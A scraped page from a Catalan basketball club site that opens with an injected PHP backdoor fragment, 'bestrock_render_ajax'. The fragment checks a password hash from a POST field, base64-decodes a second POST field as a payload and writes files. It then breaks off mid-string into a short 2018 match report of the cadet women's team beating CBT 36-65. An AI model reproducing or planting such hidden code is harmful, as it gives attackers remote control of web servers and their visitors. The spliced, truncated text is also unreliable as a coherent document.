function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení 03 A fa una gran segona meitat i venç el CBT (36-65) - Tgn Bàsquet Club -

El cadet femení 03 A fa una gran segona meitat i venç el CBT (36-65)

Updated: febrer 20, 2018

El cadet femení 03 A va guanyar el CBT en un partit que es va decidir després del descans. El conjunt lila, que va sortir un pèl nerviós, va poder dur la iniciativa en el primer període però les locals van intensificar el seu joc en el segon quart i van evitar que la diferència fos més enllà dels 9 punts (23-32 al descans). Després de la mitja part, però, el TGN Bàsquet va oferir uns grans minuts de defensa i contraatac. El joc col·lectiu es va completar amb accions individuals molt destacades i la diferència va anar creixent fins als 29 punts finals.